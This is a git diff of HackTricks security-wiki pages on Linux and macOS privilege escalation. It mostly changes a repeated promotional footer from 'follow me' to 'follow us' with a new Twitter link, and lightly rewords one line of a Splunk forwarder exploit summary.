@@ -63,7 +63,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/selinux.md b/linux-hardening/privilege-escalation/selinux.md index c61e6d583..4550835bc 100644 --- a/linux-hardening/privilege-escalation/selinux.md +++ b/linux-hardening/privilege-escalation/selinux.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -45,7 +45,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/socket-command-injection.md b/linux-hardening/privilege-escalation/socket-command-injection.md index 1c001d4b0..89d216a95 100644 --- a/linux-hardening/privilege-escalation/socket-command-injection.md +++ b/linux-hardening/privilege-escalation/socket-command-injection.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -69,7 +69,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md b/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md index dbbfb3f70..65996b6dd 100644 --- a/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md +++ b/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. @@ -24,7 +24,7 @@ In the first image below you can see how a Splunkd web page looks like. ## Splunk Universal Forwarder Agent Exploit Summary -**For further details check the post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/)** +For further details check the post [https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/). This is just a sumary: **Exploit Overview:** An exploit targeting the Splunk Universal Forwarder Agent (UF) allows attackers with the agent password to execute arbitrary code on systems running the agent, potentially compromising an entire network. 
@@ -71,7 +71,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md index cdcf2bf34..5e1a783b1 100644 --- a/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md +++ b/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -53,7 +53,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index fbf049411..ab67eeb19 100644 --- a/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/linux-hardening/privilege-escalation/wildcards-spare-tricks.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -96,7 +96,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/write-to-root.md b/linux-hardening/privilege-escalation/write-to-root.md index e6525ea6d..6088d573f 100644 --- a/linux-hardening/privilege-escalation/write-to-root.md +++ b/linux-hardening/privilege-escalation/write-to-root.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -58,7 +58,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md index 94cbd7e8f..55985a1fd 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -147,7 +147,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md index b08ba990e..769a50fc6 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -358,7 +358,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md index 632605e64..c3a0a3543 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -190,7 +190,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md index e1612a369..ad67422c2 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -416,7 +416,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md index 79c9f1daa..e3148d62a 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
@@ -456,7 +456,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md index 78ca3c59a..8d1b15655 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md 
@@ -9,7 +9,7 @@ Other ways to support HackTricks: * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. 
